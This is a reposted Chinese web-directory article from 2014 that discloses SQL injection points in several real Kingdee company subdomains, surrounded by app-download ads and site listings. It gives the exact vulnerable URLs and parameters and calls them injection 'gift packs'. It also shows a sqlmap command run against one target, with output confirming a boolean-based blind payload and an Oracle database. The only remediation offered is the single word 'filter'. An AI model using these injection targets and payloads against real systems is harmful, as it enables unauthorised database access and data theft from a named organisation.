数据统计：556个主题分类，79988个优秀站点，4348个站点正在排队审核，33236篇站长资讯

快捷方式：网站提交 - 软文投稿 - 意见反馈 - 关于

当前位置：站长啦网站目录 » 新闻资讯 » 站长新闻 » 漏洞预警 » 文章详细

金蝶网分站高危root权限注射下载

来源：黑吧安全网　浏览：1152次　时间：2014-04-28

root权限注射，涉及的站点很广。

注射点：http://en.kingdee.com/index.php?option=com_ninj

arsssyndicator&feed_id=1&format=raw&catid=4

下面是来几个注射小礼包：

注射点：http://open.kingdee.com/K3cloud/CDPPortal/App.aspx?id=1

注射点：http://cms.kingdee.com/solutions/business/scm/s

cmCaseList.jsp?columnId=151201301

G:\Python27\sqlmap>sqlmap.py -u "http://www.myhack58.com/ http://cms.kingdee.com/solutions/business/scm/s

cmCaseList.jsp?columnId=151201301" --users
sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 22:22:06

[22:22:07] [INFO] resuming back-end DBMS 'oracle'

[22:22:07] [INFO] testing connection to the target URL

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: columnId

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: columnId=151201301%' AND 6131=6131 AND '%'='

---

[22:22:07] [INFO] the back-end DBMS is Oracle

web application technology: JSP

back-end DBMS: Oracle

修复方案：

过滤~

版权与免责声明：

凡注明稿件来源的内容均为转载稿或由网友用户注册发布，本网转载出于传递更多信息的目的；如转载稿涉及版权问题，请作者联系我们，同时对于用户评论等信息，本网并不意味着赞同其观点或证实其内容的真实性；

本文地址：https://top.cnzzla.com/artinfo/707.html

上一篇：百度贴吧xss蠕虫下载
下一篇：中国工商银行账户可批量猜测导致信息泄露下载

游戏新闻

推荐资讯

好玩的手游下载

英雄棋士团(预下载)
策略放置战棋
240.99M | 立即下载
美食小当家
模拟经营经营单机
| 立即下载
2047
多人联机卡牌策略
| 立即下载
荣誉指挥官(预下载)
策略多人联机即时战斗
464.43M | 立即下载
繁荣美食市场物语
像素放置模拟经营
| 立即下载
夸克浏览器 v4.2.1.138 好用的手机浏览器
夸克浏览器
下载内详 | 立即下载
移动办公软件 OfficeSuite Premium v10.18.28716 内购解锁版
移动办公软件 OfficeSuite Premium
下载内详 | 立即下载
乐秀视频编辑器 VideoShow v8.8.4 内购解锁版
乐秀视频编辑器 VideoShow
下载内详 | 立即下载
X 浏览器 v3.3.9 一款小巧的安卓浏览器
X 浏览器
下载内详 | 立即下载
安卓密码管理软件 Enpass v6.4.5.368 内购解锁版
安卓密码管理软件 Enpass
下载内详 | 立即下载
差分复制同步 FastCopy-M v3.6.3.51 绿色便携版
差分复制同步
下载内详 | 立即下载
多标签页拓展 Clover v3.5.2 Build 19809 精简绿色版
<a href="https://www.appcgn.com/clo
下载内详 | 立即下载
文件重命名 Advanced Renamer v3.85 Lite 绿色便携版
<a href="https://www.appcgn.com/ad
下载内详 | 立即下载
网络防火监控 GlassWire Elite v2.1.166 绿色便携版
网络防火监控 GlassWire Elite
下载内详 | 立即下载
影音播放器 Daum Potplayer v1.7.20538 美化便携版
影音播放器 Daum Potplayer
下载内详 | 立即下载

推荐文章

猜你喜欢

推荐站点

福州小程序开发
福州好小蚁科技提供专业的微信小程序开发、软件定制、手机APP开发、网站开发等高端定制外包服务，价格美丽,服务周到.一对一项目对接，不满意退全款！预约电话:13107632710 胡小春！福州好小蚁科技有限公司是福建福州网站app等技术开发优秀网络公司。
www.fzant.com
世界时间网
世界时间网为您提供世界各地精准时间，北京时间校准器，标准时间，世界各地时间与北京时间对比，时间换算等，希望对您有所帮助。
top.cnzzla.com/time
科技镇
科技镇 | 关注科技、娱乐、人文、生活！
www.kejizhen.com
心动网址导航
心动网址导航精选了国内国外著名的网站、好玩的、好看的、有趣的国内国外网站以及实用的、优秀的国内国外网站,包括国外视频、国外购物、国外交友、国外新闻等多种类型同时提供精品行业分类目录提交，让用户全方位了解国内国外互联网动态！
xd00.com
门户网址-优秀网站导航
门户网址-优秀网站导航,精选网址导航，免费分类目录提交，实用酷站大全。
top.mhwz.cn

最新优秀网站